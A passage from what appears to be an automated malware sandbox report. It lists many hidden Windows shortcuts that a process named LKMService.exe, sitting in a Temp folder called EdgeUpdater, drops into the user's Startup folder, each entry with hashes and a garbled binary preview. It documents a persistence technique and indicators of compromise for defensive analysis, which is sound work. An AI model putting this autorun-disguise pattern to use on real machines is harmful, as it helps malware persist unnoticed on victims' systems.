=...........................Z.L.K.M.S.e.r.v.i.c.e...e.x.e.......k...............-.......j............Y&......C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......927537...........hT..CrF.f4... .<}T..b...,.......hT..CrF.f4... .<}T..b...,..................1SPS.XF.L8C....&

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_525705db1b024948a3a63ea2168b1c83.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Wed Oct 2 06:40:58 2024, mtime=Wed Oct 2 06:41:37 2024, atime=Wed Oct 2 06:40:57 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1185
Entropy (8bit):	4.951683680141534
Encrypted:	false
SSDEEP:	24:8Pq2A3pd+E0RdgKtRNglhW8Apfv/42eVvqyFm:8Pq2er0R/rRvggyF
MD5:	5184B83B72A6307DF882164167791F63
SHA1:	9B3647C2E3CF7EB3B46AE78086ED9352ACD03712
SHA-256:	A161CD81D3F59089881A863C7FB89BD6A7A9512AFDB67E72282251ACF73662B1
SHA-512:	2942C702851556E59FADE254820802774A08A00D4AB1E5EE6AAB2CD86242C63A63EC7AD7AFDC228D61A00FCF528F39530E0F741F86A80BF1206180263FD848B2
Malicious:	false
Preview:	L..................F...."...o.k.....Q.......0<k.....j......................&.:..DG..Yr?.D..U..k0.&...&......vk.v.......g....1d.k........t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^BY.=...........................%..A.p.p.D.a.t.a...B.P.1.....BY.=..Local.<......CW.^BY.=....b.....................O ..L.o.c.a.l.....N.1.....BY3=..Temp..:......CW.^BY3=....l.....................Bu_.T.e.m.p.....`.1.....BY&=..EDGEUP~1..H......BY =BY&=..............................E.d.g.e.U.p.d.a.t.e.r.....j.2..j..BY.=".LKMSER~1.EXE..N......BY =BY =...........................Z.L.K.M.S.e.r.v.i.c.e...e.x.e.......k...............-.......j............Y&......C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......927537...........hT..CrF.f4... .<}T..b...,.......hT..CrF.f4... .<}T..b...,..................1SPS.XF.L8C....&

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_536febaff0c14399b2a5f0a71f27abb5.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Wed Oct 2 06:40:58 2024, mtime=Wed Oct 2 06:42:43 2024, atime=Wed Oct 2 06:40:57 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1185
Entropy (8bit):	4.959862810288341
Encrypted:	false
SSDEEP:	24:8PSOpd+E0RggKwqRNglhW8Apfv/42eVvqyFm:8PSOr0RfqrRvggyF
MD5:	FCA758E65569D1DA01BB5C07B7ABFC7A
SHA1:	921356595364A3F8958DC5F9AAF508014DE92FEA
SHA-256:	377B3E1B0BFF434D9CAE70C09206A15CCA54F2CD00854732D2984860B0673482
SHA-512:	8BB66BE17CEF99054F861909D7EED050C7815F4FC253EF287062ED5F3DD49A5308A33335DF3CC60C39C82B24CE6ECAB67155AA748D63D9BEE63EC2DE90B66CF7
Malicious:	false
Preview:	L..................F...."...o.k.....}......0<k.....j......................&.:..DG..Yr?.D..U..k0.&...&......vk.v.......g....../.........t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^BY.=...........................%..A.p.p.D.a.t.a...B.P.1.....BY.=..Local.<......CW.^BY.=....b.....................O ..L.o.c.a.l.....N.1.....BYV=..Temp..:......CW.^BYV=....l.......................G.T.e.m.p.....`.1.....BY&=..EDGEUP~1..H......BY =BY&=..............................E.d.g.e.U.p.d.a.t.e.r.....j.2..j..BY.=".LKMSER~1.EXE..N......BY =BY =...........................Z.L.K.M.S.e.r.v.i.c.e...e.x.e.......k...............-.......j............Y&......C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......927537...........hT..CrF.f4... .<}T..b...,.......hT..CrF.f4... .<}T..b...,..................1SPS.XF.L8C....&

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_5474480259634b5ba4b73fba1c31bddd.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Wed Oct 2 06:40:58 2024, mtime=Wed Oct 2 06:42:18 2024, atime=Wed Oct 2 06:40:57 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1185
Entropy (8bit):	4.949554166093217
Encrypted:	false
SSDEEP:	24:8PgA3pd+E0R8gKsRNglhW8Apfv/42eVvqyFm:8Pger0RTrRvggyF
MD5:	1AB00C36002C2241D7BB2F510C94B7DB
SHA1:	26F26A7DB1BCC83210BC20559B4423CE46C2EFAA
SHA-256:	35DE5D7F01B131D3414E5A6429D3E0A5E680C03FAE7E945A91D1D333C9588F13
SHA-512:	D03ED68919DCE64D322FFB53920B31828B1BDD784CFCD3EDBDF24FC690EDD19A71C4E28CAB4BC35BE79AEDE15381D50B3D598FC31C75E54EDEDFA4BC345F8683
Malicious:	false
Preview:	L..................F...."...o.k....f........0<k.....j......................&.:..DG..Yr?.D..U..k0.&...&......vk.v.......g....1d.k........t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^BY.=...........................%..A.p.p.D.a.t.a...B.P.1.....BY.=..Local.<......CW.^BY.=....b.....................O ..L.o.c.a.l.....N.1.....BYJ=..Temp..:......CW.^BYJ=....l.....................V ..T.e.m.p.....`.1.....BY&=..EDGEUP~1..H......BY =BY&=..............................E.d.g.e.U.p.d.a.t.e.r.....j.2..j..BY.=".LKMSER~1.EXE..N......BY =BY =...........................Z.L.K.M.S.e.r.v.i.c.e...e.x.e.......k...............-.......j............Y&......C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......927537...........hT..CrF.f4... .<}T..b...,.......hT..CrF.f4... .<}T..b...,..................1SPS.XF.L8C....&

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_59877324bd47442fb11e2a1cb98d1af6.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Wed Oct 2 06:40:58 2024, mtime=Wed Oct 2 06:42:41 2024, atime=Wed Oct 2 06:40:57 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1185
Entropy (8bit):	4.952738451578799
Encrypted:	false
SSDEEP:	24:8PJOpd+E0RTgK9RNglhW8Apfv/42eVvqyFm:8PJOr0RhrRvggyF
MD5:	F6DA06DDAAD72CE33D8192394A18F3BF
SHA1:	62A22FA4491328DD7F055E06D23E16BBC77E8A67
SHA-256:	C13C5EC05A9E99F97156F3AE15307F41C9D8F1DF981CC66AD28D3F2D14F40CB4
SHA-512:	F14A6D7A436CFD005DD0978511674BEF8ABF62D55DAFD17AAB96F645883B9F9BEDB68F0AFFD2CB36D8875372AFAD7CE3D0A1A39C36EE417BBFA157A337AD4178
Malicious:	false
Preview:	L..................F...."...o.k.....T9......0<k.....j......................&.:..DG..Yr?.D..U..k0.&...&......vk.v.......g....../.........t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^BY.=...........................%..A.p.p.D.a.t.a...B.P.1.....BY.=..Local.<......CW.^BY.=....b.....................O ..L.o.c.a.l.....N.1.....BYU=..Temp..:......CW.^BYU=....l.......................a.T.e.m.p.....`.1.....BY&=..EDGEUP~1..H......BY =BY&=..............................E.d.g.e.U.p.d.a.t.e.r.....j.2..j..BY.=".LKMSER~1.EXE..N......BY =BY =...........................Z.L.K.M.S.e.r.v.i.c.e...e.x.e.......k...............-.......j............Y&......C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......927537...........hT..CrF.f4... .<}T..b...,.......hT..CrF.f4... .<}T..b...,..................1SPS.XF.L8C....&

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_5bd05526e84c4b6e83d0689c52cd4ce6.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Wed Oct 2 06:40:58 2024, mtime=Wed Oct 2 06:42:07 2024, atime=Wed Oct 2 06:40:57 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1185
Entropy (8bit):	4.950286673638043
Encrypted:	false
SSDEEP:	24:8PHA3pd+E0RJgKDRNglhW8Apfv/42eVvqyFm:8PHer0R5rRvggyF
MD5:	C080B83C5B8E58933B444EB57A85D7DB
SHA1:	818653CEF32242FB233C9E8AFB92C2A0C4919EED
SHA-256:	7F06227139DC64CC5569F5EA31542866F31DBEEB780D6959490EA52CB355DFCA
SHA-512:	83DFC1A8B24FDB9BE5E9ADFC8250C1BDADE5BDA7187EAABE797743E7F80657E8BC4343B72AB6755C6784BD9A9F962C213496A7C8848E4C17BBF46A592873A1A9
Malicious:	false
Preview:	L..................F...."...o.k.....1......0<k.....j......................&.:..DG..Yr?.D..U..k0.&...&......vk.v.......g....1d.k........t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^BY.=...........................%..A.p.p.D.a.t.a...B.P.1.....BY.=..Local.<......CW.^BY.=....b.....................O ..L.o.c.a.l.....N.1.....BY7=..Temp..:......CW.^BY7=....l......................F..T.e.m.p.....`.1.....BY&=..EDGEUP~1..H......BY =BY&=..............................E.d.g.e.U.p.d.a.t.e.r.....j.2..j..BY.=".LKMSER~1.EXE..N......BY =BY =...........................Z.L.K.M.S.e.r.v.i.c.e...e.x.e.......k...............-.......j............Y&......C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......927537...........hT..CrF.f4... .<}T..b...,.......hT..CrF.f4... .<}T..b...,..................1SPS.XF.L8C....&

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_5c8f7c55cab44e29beabdda5cac31471.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Wed Oct 2 06:40:58 2024, mtime=Wed Oct 2 06:41:56 2024, atime=Wed Oct 2 06:40:57 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1185
Entropy (8bit):	4.950828237826827
Encrypted:	false
SSDEEP:	24:8PnA3pd+E0RJgKDRNglhW8Apfv/42eVvqyFm:8Pner0R5rRvggyF
MD5:	E3CFFB0BA271B39A69B32F07C0002E5D
SHA1:	9F88DCBBF08B9870E888A19E83AE741E483C9D44
SHA-256:	97F188D1E0F8FDEC5476907A7923FA7403EF766A383F76924742A57C88FDD322
SHA-512:	CC0204DF5D849EB7CEDF759B15CD886CD168A766F51E9022CCE8AD0C5F82E20277EF0BF2FE4A865C46DABC8E59398940B44E9D8CAABA4F3E2A69F9654802BF3C
Malicious:	false
Preview:	L..................F...."...o.k............0<k.....j......................&.:..DG..Yr?.D..U..k0.&...&......vk.v.......g....1d.k........t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^BY.=...........................%..A.p.p.D.a.t.a...B.P.1.....BY.=..Local.<......CW.^BY.=....b.....................O ..L.o.c.a.l.....N.1.....BY7=..Temp..:......CW.^BY7=....l......................F..T.e.m.p.....`.1.....BY&=..EDGEUP~1..H......BY =BY&=..............................E.d.g.e.U.p.d.a.t.e.r.....j.2..j..BY.=".LKMSER~1.EXE..N......BY =BY =...........................Z.L.K.M.S.e.r.v.i.c.e...e.x.e.......k...............-.......j............Y&......C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......927537...........hT..CrF.f4... .<}T..b...,.......hT..CrF.f4... .<}T..b...,..................1SPS.XF.L8C....&

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_5d506a0aa16a4925a5cdd1c3979d20e0.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Wed Oct 2 06:40:58 2024, mtime=Wed Oct 2 06:41:04 2024, atime=Wed Oct 2 06:40:57 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1185
Entropy (8bit):	4.95221641886838
Encrypted:	false
SSDEEP:	24:8PjgA3pd+E0R+gKncNglhW8Apfv/42eVvqyFm:8P8er0RWSRvggyF
MD5:	A9DAC8CB61EB8E49156F96343A90AC73
SHA1:	05C8FD10EE3A9880DD6275D145CD213AC75D69EA
SHA-256:	90FE7CF82EC022FE2DC9D185164E56E780B501BDF6A38CF49180764472B4CE03
SHA-512:	1A055D61022EDE6C352AA2B8B9CC75F9EAD6A0BC8EB78A6CD1C4E80524CA0D7821E4C6C88437FAF923E91C6F4ACE69393BBFB685CFC11D89A179A8CD1730B5FA
Malicious:	false
Preview:	L..................F...."...o.k....)(Bo.....0<k.....j......................&.:..DG..Yr?.D..U..k0.&...&......vk.v.......g....1d.k........t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^BY.=...........................%..A.p.p.D.a.t.a...B.P.1.....BY.=..Local.<......CW.^BY.=....b.....................O ..L.o.c.a.l.....N.1.....BY =..Temp..:......CW.^BY =....l.......................*.T.e.m.p.....`.1.....BY"=..EDGEUP~1..H......BY =BY"=..............................E.d.g.e.U.p.d.a.t.e.r.....j.2..j..BY.=".LKMSER~1.EXE..N......BY =BY =...........................Z.L.K.M.S.e.r.v.i.c.e...e.x.e.......k...............-.......j............Y&......C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......927537...........hT..CrF.f4... .<}T..b...,.......hT..CrF.f4... .<}T..b...,..................1SPS.XF.L8C....&

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_644d0edcd69d4559b0de6effc8f2f097.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Wed Oct 2 06:40:58 2024, mtime=Wed Oct 2 06:41:54 2024, atime=Wed Oct 2 06:40:57 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1185
Entropy (8bit):	4.942060001940275
Encrypted:	false
SSDEEP:	24:8PHA3pd+E0RJgKDRNglhW8Apfv/42eVvqyFm:8PHer0R5rRvggyF
MD5:	D5B370A080C86AF9380AFE5D171B1409
SHA1:	75F0F436A6EC4B9E2D5ECDCE35D10A04751B732C
SHA-256:	DBC38D3F7B5A352D504B3A143AA92739F1342CDF1153B07A8EB56001108D7397
SHA-512:	69F5C17D23E51401794F82CE18A76C31A9815D9351FDBFD4F1882DCEADCB4836E9952BBD5811EB184BEFE5215B91452C98438AA71990EC23378C6883A33C9E9F
Malicious:	false
Preview:	L..................F...."...o.k......l......0<k.....j......................&.:..DG..Yr?.D..U..k0.&...&......vk.v.......g....1d.k........t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^BY.=...........................%..A.p.p.D.a.t.a...B.P.1.....BY.=..Local.<......CW.^BY.=....b.....................O ..L.o.c.a.l.....N.1.....BY7=..Temp..:......CW.^BY7=....l......................F..T.e.m.p.....`.1.....BY&=..EDGEUP~1..H......BY =BY&=..............................E.d.g.e.U.p.d.a.t.e.r.....j.2..j..BY.=".LKMSER~1.EXE..N......BY =BY =...........................Z.L.K.M.S.e.r.v.i.c.e...e.x.e.......k...............-.......j............Y&......C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......927537...........hT..CrF.f4... .<}T..b...,.......hT..CrF.f4... .<}T..b...,..................1SPS.XF.L8C....&

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_6454922a2cdb481e83cd4fbe99c8f5d7.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Wed Oct 2 06:40:58 2024, mtime=Wed Oct 2 06:42:52 2024, atime=Wed Oct 2 06:40:57 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1185
Entropy (8bit):	4.953133554211517
Encrypted:	false
SSDEEP:	24:8PqeKpd+E0RggKLOxRNglhW8Apfv/42eVvqyFm:8PVKr0ROOxrRvggyF
MD5:	C0AF5B0659029C5C0BD14875EB34A4A9
SHA1:	E6D032CD3A4D1D45F3ABCF68D382957CF732A125
SHA-256:	FB14828D2DAF0964BB961F0189A036F8628EF29FEF525027F54DBD94D3DA7387
SHA-512:	11E672150330C0CB7E95287C2AB175713F1E91263A29D6E2354C8A0C7FA9D348ED41CDDBAC8B852F71B4030995C43B4DD4043895BCD119844D75D1E27F2983C5
Malicious:	false
Preview:	L..................F...."...o.k....C......0<k.....j......................&.:..DG..Yr?.D..U..k0.&...&......vk.v.......g.....).........t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^BY.=...........................%..A.p.p.D.a.t.a...B.P.1.....BY.=..Local.<......CW.^BY.=....b.....................O ..L.o.c.a.l.....N.1.....BYV=..Temp..:......CW.^BYW=....l......................v@.T.e.m.p.....`.1.....BY&=..EDGEUP~1..H......BY =BY&=..............................E.d.g.e.U.p.d.a.t.e.r.....j.2..j..BY.=".LKMSER~1.EXE..N......BY =BY =...........................Z.L.K.M.S.e.r.v.i.c.e...e.x.e.......k...............-.......j............Y&......C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......927537...........hT..CrF.f4... .<}T..b...,.......hT..CrF.f4... .<}T..b...,..................1SPS.XF.L8C....&

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_696f7e4952744021abb683916e7ff8b5.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Wed Oct 2 06:40:58 2024, mtime=Wed Oct 2 06:42:54 2024, atime=Wed Oct 2 06:40:57 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1185
Entropy (8bit):	4.949414944220125
Encrypted:	false
SSDEEP:	24:8PGKpd+E0RggKLOxRNglhW8Apfv/42eVvqyFm:8PGKr0ROOxrRvggyF
MD5:	0FFE713087FC56916A40538F31E3F2C6
SHA1:	8498ECFCFA039678C1B13B00ED496B856B2F4EFC
SHA-256:	742F046A7A6CE14709F2D6AABB038D93B6B2D52F2AE86A4D0D37530EC6E90B98
SHA-512:	D734B0FE4A44355CDAB8CD8BDE095BC82A6E468F765A110379844F5C7B1C9BA1BA738EAD2899762A35E6D7A040E840E20EED9320EE2A1BBDA0875C9EB39EA30D
Malicious:	false
Preview:	L..................F...."...o.k....x\......0<k.....j......................&.:..DG..Yr?.D..U..k0.&...&......vk.v.......g.....).........t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^BY.=...........................%..A.p.p.D.a.t.a...B.P.1.....BY.=..Local.<......CW.^BY.=....b.....................O ..L.o.c.a.l.....N.1.....BYV=..Temp..:......CW.^BYW=....l......................v@.T.e.m.p.....`.1.....BY&=..EDGEUP~1..H......BY =BY&=..............................E.d.g.e.U.p.d.a.t.e.r.....j.2..j..BY.=".LKMSER~1.EXE..N......BY =BY =...........................Z.L.K.M.S.e.r.v.i.c.e...e.x.e.......k...............-.......j............Y&......C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......927537...........hT..CrF.f4... .<}T..b...,.......hT..CrF.f4... .<}T..b...,..................1SPS.XF.L8C....&

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_698605bc9fe2419b840f9d3a55d634ea.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Wed Oct 2 06:40:58 2024, mtime=Wed Oct 2 06:41:19 2024, atime=Wed Oct 2 06:40:57 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1185
Entropy (8bit):	4.9624545513065526
Encrypted:	false
SSDEEP:	24:8PCA3pd+E0RcgKC5nRNglhW8Apfv/42eVvqyFm:8PCer0R1prRvggyF
MD5:	D115111ACF0DA6EAD59E1AC598C832D2
SHA1:	FF113B3A264EFF8EA18CB8C17211B63B7B152DF9
SHA-256:	09A67114861E2A5EE1793D90FE514FF0952984A3E556306A58D4926F5468A5C0
SHA-512:	9295B282EAEB8D2DF322299D00438C3C3E51DE77E796CFF551CCE913E756B98034A750AE99ECB455C812A1B0482F1314D062B9CF51AA7006090B93BB7F653863
Malicious:	false
Preview:	L..................F...."...o.k......]x.....0<k.....j......................&.:..DG..Yr?.D..U..k0.&...&......vk.v.......g....1d.k........t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^BY.=...........................%..A.p.p.D.a.t.a...B.P.1.....BY.=..Local.<......CW.^BY.=....b.....................O ..L.o.c.a.l.....N.1.....BY=..Temp..:......CW.^BY=....l.........................T.e.m.p.....`.1.....BY&=..EDGEUP~1..H......BY =BY&=..............................E.d.g.e.U.p.d.a.t.e.r.....j.2..j..BY.=".LKMSER~1.EXE..N......BY =BY =...........................Z.L.K.M.S.e.r.v.i.c.e...e.x.e.......k...............-.......j............Y&......C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......927537...........hT..CrF.f4... .<}T..b...,.......hT..CrF.f4... .<}T..b...,..................1SPS.XF.L8C....&

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_6a370c7763f846c5add18054d5cf7e81.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Wed Oct 2 06:40:58 2024, mtime=Wed Oct 2 06:42:58 2024, atime=Wed Oct 2 06:40:57 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1185
Entropy (8bit):	4.951720413248894
Encrypted:	false
SSDEEP:	24:8PzaFpd+E0RggKLOxRNglhW8Apfv/42eVvqyFm:8PzaFr0ROOxrRvggyF
MD5:	F4D1172F731799D839FAADBE01C3E3D1
SHA1:	9B3E2F948FAB750DFDEC403396F49236B3698F1D
SHA-256:	13436023DCAA1C74245817FDD12C2850904BDCAD8D6F8EF871182EA4204189B5
SHA-512:	0DC1297A5C8F2EE49BBC8F1AA6AC1B7D61F34FD635F0B70CE2FDE89398E5A5A12D462FDFDC0907C45FA7FE997196910E20464A29922880910555A77FB987016A
Malicious:	false
Preview:	L..................F...."...o.k.....fO......0<k.....j......................&.:..DG..Yr?.D..U..k0.&...&......vk.v.......g....:N..........t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^BY.=...........................%..A.p.p.D.a.t.a...B.P.1.....BY.=..Local.<......CW.^BY.=....b.....................O ..L.o.c.a.l.....N.1.....BYV=..Temp..:......CW.^BYW=....l......................v@.T.e.m.p.....`.1.....BY&=..EDGEUP~1..H......BY =BY&=..............................E.d.g.e.U.p.d.a.t.e.r.....j.2..j..BY.=".LKMSER~1.EXE..N......BY =BY =...........................Z.L.K.M.S.e.r.v.i.c.e...e.x.e.......k...............-.......j............Y&......C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......927537...........hT..CrF.f4... .<}T..b...,.......hT..CrF.f4... .<}T..b...,..................1SPS.XF.L8C....&

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_6a6dff5aa45e418caf62b9ca4b78cd42.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Wed Oct 2 06:40:58 2024, mtime=Wed Oct 2 06:41:47 2024, atime=Wed Oct 2 06:40:57 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1185
Entropy (8bit):	4.947039018421195
Encrypted:	false
SSDEEP:	24:8PsA3pd+E0RJgKDRNglhW8Apfv/42eVvqyFm:8Pser0R5rRvggyF
MD5:	1F6E596142B04B24B6CA173F56CAA80D
SHA1:	9670338A47B59CBB0711F3082DE1ACD0FCFBFBAE
SHA-256:	05255D40E7758113A9812A8B3694287A125C80F01FD09AA0E4B61B2E85CFA1EA
SHA-512:	C13DF8E89101D70E98D851F936F0D907D2AB5978165C85B6ECAF2706EFFF3E30000C108C0A58358328537C7FD4AF60FF4A7588C0BAA380F4D738701752E02217
Malicious:	false
Preview:	L..................F...."...o.k.....G.......0<k.....j......................&.:..DG..Yr?.D..U..k0.&...&......vk.v.......g....1d.k........t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^BY.=...........................%..A.p.p.D.a.t.a...B.P.1.....BY.=..Local.<......CW.^BY.=....b.....................O ..L.o.c.a.l.....N.1.....BY7=..Temp..:......CW.^BY7=....l......................F..T.e.m.p.....`.1.....BY&=..EDGEUP~1..H......BY =BY&=..............................E.d.g.e.U.p.d.a.t.e.r.....j.2..j..BY.=".LKMSER~1.EXE..N......BY =BY =...........................Z.L.K.M.S.e.r.v.i.c.e...e.x.e.......k...............-.......j............Y&......C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......927537...........hT..CrF.f4... .<}T..b...,.......hT..CrF.f4... .<}T..b...,..................1SPS.XF.L8C....&

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_6ba5a904fb744f16bcad34df95bf7b7d.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Wed Oct 2 06:40:58 2024, mtime=Wed Oct 2 06:41:27 2024, atime=Wed Oct 2 06:40:57 2024, length=27136, window=hide
